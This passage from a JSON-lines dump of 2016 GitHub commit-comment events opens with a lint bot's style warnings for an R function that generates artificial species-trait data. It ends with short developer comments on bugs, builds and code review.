\"\")\n^\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:16:12:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L16) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:22:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:19:14:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L19) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:19:25:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L19) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:12:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:19:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:21:37:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:21:40:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:23:17:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:24:61:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                           ~^~\n```\n[R/generateArtificialData.R:24:63:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L24) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix(cbind(column1, traits_pool), ncol = (n_traits + 1))\n                                                              ^\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:24:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:26:31:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:28:26:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:28:43:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L28) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:28:58:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:31:19:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:31:24:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                      ~^~\n```\n[R/generateArtificialData.R:31:51:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                 ~^~\n```\n[R/generateArtificialData.R:31:59:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10^rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                         ~^~\n```\n[R/generateArtificialData.R:32:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:50:65:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:51:30:](https://github.com/thijsjanzen/STEPCAM/blob/d91cf846a66b758e0b0bbc298e0d638165ec7ad0/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n"}},"created_at":"2016-09-18T16:33:46Z"}
{"id":"4580212902","type":"CommitCommentEvent","actor":{"login":"generall"},"repo":{"name":"MakarovYaroslav/kursovaya"},"payload":{"comment":{"id":19071286,"position":36,"line":36,"path":"main_functions.py","commit_id":"67a8777f8dc02e28d4c9a4e7a4089dc8d422ca97","created_at":"2016-09-18T16:35:32Z","updated_at":"2016-09-18T16:35:32Z","body":"Лучше через параметры командной строки. Удобнее автоматизируется.\r\n https://docs.python.org/3.3/library/argparse.html"}},"created_at":"2016-09-18T16:35:32Z"}
{"id":"4580212941","type":"CommitCommentEvent","actor":{"login":"McLoy"},"repo":{"name":"McLoy/EasyTasks"},"payload":{"comment":{"id":19071287,"position":null,"line":null,"path":null,"commit_id":"4e07d454ef63df20fc55c28f6268ff9816a0e6a4","created_at":"2016-09-18T16:35:34Z","updated_at":"2016-09-18T16:35:34Z","body":"Link \"Notify me\" crashed"}},"created_at":"2016-09-18T16:35:34Z"}
{"id":"4580213013","type":"CommitCommentEvent","actor":{"login":"sant0ro"},"repo":{"name":"sant0ro/Yupi"},"payload":{"comment":{"id":19071288,"position":null,"line":null,"path":null,"commit_id":"e4f4e7db6e74def027e39004c5c83eedae5f787e","created_at":"2016-09-18T16:35:37Z","updated_at":"2016-09-18T16:35:37Z","body":"Catalogue Index continues not working. Gives an exception here:\r\n![image](https://cloud.githubusercontent.com/assets/12037269/18617394/bbcacf90-7da4-11e6-9bc1-214d4c69c645.png)\r\n\r\nIt's that a bug? Or you didn't finished Catalogue Index? xD"}},"created_at":"2016-09-18T16:35:37Z"}
{"id":"4580213128","type":"CommitCommentEvent","actor":{"login":"STJEREM"},"repo":{"name":"SirRade/JNF_NEAT"},"payload":{"comment":{"id":19071291,"position":6,"line":3,"path":"Examples/XOR/Sources/main.cpp","commit_id":"b75719a01b70881c6ea9ba11d9e582cef1220bbf","created_at":"2016-09-18T16:35:41Z","updated_at":"2016-09-18T16:35:41Z","body":"This is not a library import"}},"created_at":"2016-09-18T16:35:41Z"}
{"id":"4580214456","type":"CommitCommentEvent","actor":{"login":"lmrv"},"repo":{"name":"lmrv/cloudstack"},"payload":{"comment":{"id":19071294,"position":null,"line":null,"path":null,"commit_id":"95faab74fa9109647fb1a128a12174d244db2a17","created_at":"2016-09-18T16:36:32Z","updated_at":"2016-09-18T16:36:32Z","body":"Here is the JIRA issue for this pull request : \r\nhttps://issues.apache.org/jira/browse/CLOUDSTACK-9501"}},"created_at":"2016-09-18T16:36:32Z"}
{"id":"4580214715","type":"CommitCommentEvent","actor":{"login":"ashishraman96"},"repo":{"name":"GLUG-REVA/GLUG-REVA.github.io"},"payload":{"comment":{"id":19071295,"position":null,"line":null,"path":null,"commit_id":"9b52409ed3fbd4ad78053e8fc4bce2fbf411315f","created_at":"2016-09-18T16:36:43Z","updated_at":"2016-09-18T16:36:43Z","body":"Worked on desktop, didnt in mobile\r\n"}},"created_at":"2016-09-18T16:36:43Z"}
{"id":"4580215352","type":"CommitCommentEvent","actor":{"login":"richvdh"},"repo":{"name":"matrix-org/matrix-js-sdk"},"payload":{"comment":{"id":19071297,"position":null,"line":null,"path":null,"commit_id":"4f22610499a7463342dfa74a12c9cfa6941ad10c","created_at":"2016-09-18T16:37:09Z","updated_at":"2016-09-18T16:37:09Z","body":"It was horribly unclear before."}},"created_at":"2016-09-18T16:37:09Z"}
{"id":"4580215610","type":"CommitCommentEvent","actor":{"login":"spike11302000"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":19071298,"position":null,"line":null,"path":null,"commit_id":"2a2370a50def1475d91fc49c86bcaebf4b11bef7","created_at":"2016-09-18T16:37:20Z","updated_at":"2016-09-18T16:37:20Z","body":"nice pathfinding\r\n"}},"created_at":"2016-09-18T16:37:20Z"}
{"id":"4580215646","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19071299,"position":null,"line":null,"path":null,"commit_id":"7b9d3f860588c5157ec9cb2a325e9e16a2ab6e17","created_at":"2016-09-18T16:37:22Z","updated_at":"2016-09-18T16:37:22Z","body":"It also seems that this commit or a few around [have broken ghc bootstrapping](http://hydra.nixos.org/build/40406993) leading to lots of failed builds."}},"created_at":"2016-09-18T16:37:22Z"}
{"id":"4580219640","type":"CommitCommentEvent","actor":{"login":"Gianni-n"},"repo":{"name":"Gianni-n/workflow"},"payload":{"comment":{"id":19071307,"position":1,"line":1,"path":"info.txt","commit_id":"e37bc7e10fd7cef9b1b750fe998be4a233f22c27","created_at":"2016-09-18T16:40:04Z","updated_at":"2016-09-18T16:40:04Z","body":"you can't do this !!"}},"created_at":"2016-09-18T16:40:04Z"}
{"id":"4580220163","type":"CommitCommentEvent","actor":{"login":"hankchizljaw"},"repo":{"name":"peso-js/peso"},"payload":{"comment":{"id":19071309,"position":null,"line":null,"path":null,"commit_id":"7503f04b2fcd6d312de53ec0f1e0f81d9f01d14f","created_at":"2016-09-18T16:40:23Z","updated_at":"2016-09-18T16:40:23Z","body":"Damn mac autocorrect 😡\r\n\r\nShould be **attr module**"}},"created_at":"2016-09-18T16:40:23Z"}
{"id":"4580220488","type":"CommitCommentEvent","actor":{"login":"lschumm"},"repo":{"name":"lschumm/homebrew-fTerm"},"payload":{"comment":{"id":19071310,"position":null,"line":null,"path":null,"commit_id":"47c15a9b0278a597f1e46a4c2569bd0e2550b8f6","created_at":"2016-09-18T16:40:34Z","updated_at":"2016-09-18T16:40:34Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;brmUEkD1&#x2F;46-f-version-doesn-t-seem-to-work\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> &#39;f version&#39; doesn&#39;t seem to work</a>"}},"created_at":"2016-09-18T16:40:34Z"}
